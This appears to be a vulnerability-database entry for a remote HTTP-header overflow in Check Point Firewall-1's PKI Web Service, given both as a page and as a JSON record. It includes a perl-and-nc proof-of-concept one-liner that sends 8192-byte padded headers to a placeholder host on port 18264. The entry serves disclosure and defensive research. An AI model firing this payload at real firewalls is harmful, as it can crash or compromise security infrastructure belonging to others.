Search...

Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

2009-03-31T00:00:00

ID SSV:10921
Type seebug
Reporter Root
Modified 2009-03-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                - Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the \'Authorization\'
and \'Referer\' headers were vulnerable.

- Product

Check Point, Firewall-1, unknown

- PoC

perl -e \'print \&quot;GET / HTTP/1.0\\r\\nAuthorization: Basic\&quot; . \&quot;x\&quot; x 8192 .
\&quot;\\r\\nFrom: bugs@hugs.com\\r\\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\\r\\nReferer: http://www.owasp.org/\&quot; . \&quot;x\&quot; x 8192 .
\&quot;\\r\\nUserAgent: FsckResponsibleDisclosure 1.0\\r\\n\\r\\n\&quot;\' | nc
suckit.com 18264

- Solution

None

- Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-10921", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-03-31T00:00:00", "title": "Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10921", "cvelist": [], "description": "No description provided by source.", "viewCount": 6, "published": "2009-03-31T00:00:00", "sourceData": "\n - Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow\r\n\r\n- Description\r\n\r\nThe Check Point Firewall-1 PKI Web Service, running by default on TCP\r\nport 18264, is vulnerable to a remote overflow in the handling of very\r\nlong HTTP headers. This was discovered during a pen-test where the\r\nclient would not allow further analysis and would not provide the full\r\nproduct/version info. Initial testing indicates the \\'Authorization\\'\r\nand \\'Referer\\' headers were vulnerable.\r\n\r\n- Product\r\n\r\nCheck Point, Firewall-1, unknown\r\n\r\n- PoC\r\n\r\nperl -e \\'print \\"GET / HTTP/1.0\\\\r\\\\nAuthorization: Basic\\" . \\"x\\" x 8192 .\r\n\\"\\\\r\\\\nFrom: bugs@hugs.com\\\\r\\\\nIf-Modified-Since: Fri, 13 Dec 2006\r\n09:12:58 GMT\\\\r\\\\nReferer: http://www.owasp.org/\\" . \\"x\\" x 8192 .\r\n\\"\\\\r\\\\nUserAgent: FsckResponsibleDisclosure 1.0\\\\r\\\\n\\\\r\\\\n\\"\\' | nc\r\nsuckit.com 18264\r\n\r\n- Solution\r\n\r\nNone\r\n\r\n- Timeline\r\n\r\n2006-11-06: Vulnerability Discovered\r\n2009-03-29: Disclosed to Public\n ", "id": "SSV:10921", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:55:03", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-11-19T18:55:03", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:55:03", "rev": 2}, "vulnersScore": -0.4}, "references": [], "immutableFields": []}